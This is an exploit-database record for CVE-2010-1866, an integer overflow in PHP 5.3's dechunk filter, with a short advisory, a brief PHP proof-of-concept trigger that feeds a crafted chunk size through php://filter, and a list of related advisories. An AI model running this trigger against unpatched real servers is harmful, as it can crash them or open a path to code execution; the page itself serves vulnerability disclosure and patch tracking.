Lucene search
Stefan EsserEDB-ID:33920HistoryMay 02, 2010 - 12:00 a.m.
PHP 5.3 - 'PHP_dechunk()' HTTP Chunked Encoding Integer Overflow
2010-05-0200:00:00
Stefan Esser
www.exploit-db.com
24
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/39877/info
PHP is prone to a remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the PHP process. Failed exploit attempts will result in a denial-of-service condition.
PHP 5.3.0 through 5.3.2 are vulnerable; other versions may also be affected.
<?php
$x = '0fffffffe
XXX';
file_put_contents("file:///tmp/test.dat",$x);
$y = file_get_contents('php://filter/read=dechunk/resource=file:///tmp/test.dat');
echo "here";
?>Related
nvd
nvd
CVE-2010-1866
2010-05-07 23:00:01
cve
cve
CVE-2010-1866
2010-05-07 23:00:01
cvelist
cvelist
CVE-2010-1866
2010-05-07 22:00:00
openvas
openvas
PHP 'php_dechunk()' HTTP Chunked Encoding Integer Overflow Vulnerability
2010-05-04 00:00:00
Ubuntu Update for php5 vulnerabilities USN-989-1
2010-09-22 00:00:00
Ubuntu: Security Advisory (USN-989-1)
2010-09-22 00:00:00
prion
prion
Integer overflow
2010-05-07 23:00:00
ubuntucve
ubuntucve
CVE-2010-1866
2010-05-07 00:00:00
securityvulns
securityvulns
PHP multiple security vulnerabilities
2010-05-11 00:00:00
[USN-989-1] PHP vulnerabilities
2010-09-27 00:00:00
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
ubuntu
ubuntu
PHP vulnerabilities
2010-09-20 00:00:00
nessus
nessus
Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : php5 vulnerabilities (USN-989-1)
2010-09-21 00:00:00
openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1)
2014-06-13 00:00:00
openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1)
2010-09-13 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00